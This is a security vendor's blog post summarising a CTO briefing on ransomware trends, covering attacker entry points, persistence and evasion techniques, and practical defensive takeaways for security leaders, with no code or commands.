The Evolution of Ransomware Entry Points: Why the Perimeter Isn’t the Perimeter Anymore

In Morphisec’s recent CTO Briefing: The State of Ransomware, CTO Michael Gorelik dissected a critical reality that every CISO and security leader must confront: ransomware attacks aren’t succeeding because attackers are getting louder—they’re succeeding because they’re getting quieter. 

Modern ransomware campaigns blend stealth, social engineering, supply-chain exploitation, cloud misconfigurations, and sophisticated evasion techniques that bypass even the most advanced detection-based tools.   

The Evolution of Entry Points: Why the Perimeter Isn’t the Perimeter Anymore   

One of the strongest themes from the briefing was that initial access is no longer predictable.  

Attackers don’t rely on a single-entry method—they exploit whatever misconfiguration, overlooked control, or human blind spot they can find.   

Recent attack patterns show a dramatic rise in:   

1. SonicWall Configuration Theft and Cloud Backup Exploits 
   In the briefing, Michael detailed multiple real-world incidents where Akira ransomware actors abused SonicWall’s cloud backup feature (“MySonicWall”) to steal configuration files (EXP files) and reinfect environments—even after the victim believed they had contained the attack. 
   
   This aligns with Morphisec’s broader findings that attackers increasingly abuse legitimate tools and management consoles, rather than brute-forcing entry. 
2. Unpatched FortiGate Appliances 
   Keeling ransomware affiliates continue to exploit older Fortinet vulnerabilities—particularly those left unpatched in smaller IT environments or MSP-managed networks. 
   
   Attackers know that network appliances and boundary devices lag behind endpoint updates. 
3. Social Engineering Through Microsoft Teams 
   Michael highlighted a troubling trend: Teams-based pretexting where attackers impersonate internal IT staff to convince employees to install Quick Assist or remote-control tools. 
   
   This technique bypasses email security entirely and takes advantage of environments that allow external Teams communication. 
4. Trusted Tools Turned Against You 
   The kill chain is increasingly built on legitimate IT tools used in unintended ways: 
   • Advanced IP Scanner 
   • Nmap / ZenMap 
   • PowerShell 
   • RClone 
   • Azure Copy 
   • Backup software APIs 

 Attackers don’t break in—they walk in using the same tools your IT team relies on.   

Persistence and Backdoors: Attackers Don’t Come Alone Anymore  

Another core insight from the webinar: modern ransomware isn’t a single sequence; it’s a mesh. Attackers establish multiple overlapping backdoors so that even if you close one entry point, another one stays live.   

Recent investigations have uncovered:   

• ScreenConnect Persistence via Authentication Packages — Attackers hijack authentication packages to run ScreenConnect at the OS level, hidden beneath standard user activity. This makes it extremely difficult for EDR tools to flag malicious sessions.   
• Portable Node.js and Java Bundles —Attackers drop portable, self-contained Node.js or Java environments—including all dependencies—to create lightweight backdoors without requiring installation. They behave like legitimate software processes, making behavioral detection nearly impossible.   
• Shadow Infrastructure —Michael detailed scenarios where attackers build: 
  • Hidden virtual machines 
  • Isolated encryption environments 
  • Side-channel data transfer paths 

  … allowing them to evade all endpoint-based security. 

 This reinforces what Morphisec highlights in its What Is Anti-Ransomware? guide: 

attackers are no longer trying to “beat” your EDR—they’re operating outside its scope entirely.   

Defense Evasion: The Quiet Engine of Ransomware Success

 The briefing emphasized that ransomware succeeds because attackers can evade, not because encryption tools are sophisticated. Modern evasion tactics make ransomware payloads the least interesting part of the attack.   

Key trends include:  

1. Safe Mode Encryption —Many EDR tools—including leading solutions—are partially or completely inactive in safe mode. Attackers simply reboot a host into safe mode and run encryption unchallenged. 
2. Telemetry Suppression — Attackers tamper with: 
   • ETW (Event Tracing for Windows) 
   • Kernel callbacks 
   • Security agent notification channels 
   • Behavioral monitoring hooks 
     Without telemetry, detection tools see nothing. 
3. BYOVD (Bring Your Own Vulnerable Driver)— Even with Microsoft expanding blocklists, attackers continue to abuse signed but vulnerable drivers to gain kernel-level access and tamper with security controls. 
4. Golang and Rust-Based Encryptors— High-level languages used for custom encryptors: 
   • evade signature-based detection 
   • operate without traditional hooking 
   • compile into lightweight, static binaries 

This last trend reinforces Michael’s statement in the briefing: “There is no ransomware event without evasion. Evasion is the backbone of every modern attack.”   

Why Detection Alone Isn’t Enough   

The briefing’s most important strategic message was that detection-based security can’t keep up. Even organizations with best-in-class EDR and MDR tools continue to experience ransomware breaches.   

This reinforces a core Morphisec principle seen across multiple articles:   

• Ransomware is too fast for detection 
• The kill chain is too dynamic to identify in real time 
• The focus must shift to preemptive prevention  

Stopping ransomware requires preventing the attack chain—not waiting to detect malicious activity mid-execution.”   

What CISOs Can Do Now: Practical Takeaways from the Briefing   

1. Reduce your EDR blind spots.
   Non-agent assets—appliances, NAS devices, QNAPs, gateways—are prime targets. 
2. Harden remote collaboration tools. 
   Disable external Teams calls by default. Monitor remote admin tool usage. 
3. Treat ransomware as a business problem. 
   Attackers choose victims based on business impact and payout potential. 
4. Prioritize preemptive protection. 
   Deception technology and moving target defense stop attackers before they can execute or persist—closing the gaps where detection fails. 
5. Validate all backup assumptions. 
   Backups are one of the most commonly exploited weaknesses. Test recovery quarterly. 

A New Era of Ransomware Requires a New Era of Defense 

The ransomware kill chain of 2025 is quieter, more adaptive, and more evasive than anything seen in previous years. Attackers don’t break in—they infiltrate through misconfigurations, trusted tools, and human gaps. They don’t just encrypt—they blind your tools first. And they don’t rely on malware—they rely on your environment. 

Learn how attackers are bypassing controls—and how preemptive defense stops them. For a full breakdown of the kill chain, including real incident deep dives and predictions for 2026, watch the complete CTO briefing. 

About the author

Brad LaPorte

Chief Marketing Officer

Brad LaPorte is a seasoned cybersecurity expert and former military officer specializing in cybersecurity and military intelligence for the United States military and allied forces. With a distinguished career at Gartner as a top-rated research analyst, Brad was instrumental in establishing key industry categories such as Attack Surface Management (ASM), Extended Detection & Response (XDR), Digital Risk Protection (DRP), and the foundational elements of Continuous Threat Exposure Management (CTEM). His forward-thinking approach led to the inception of Secureworks’ MDR service and the EDR product Red Cloak—industry firsts. At IBM, he spearheaded the creation of the Endpoint Security Portfolio, as well as MDR, Vulnerability Management, Threat Intelligence, and Managed SIEM offerings, further solidifying his reputation as a visionary in cybersecurity solutions years ahead of its time.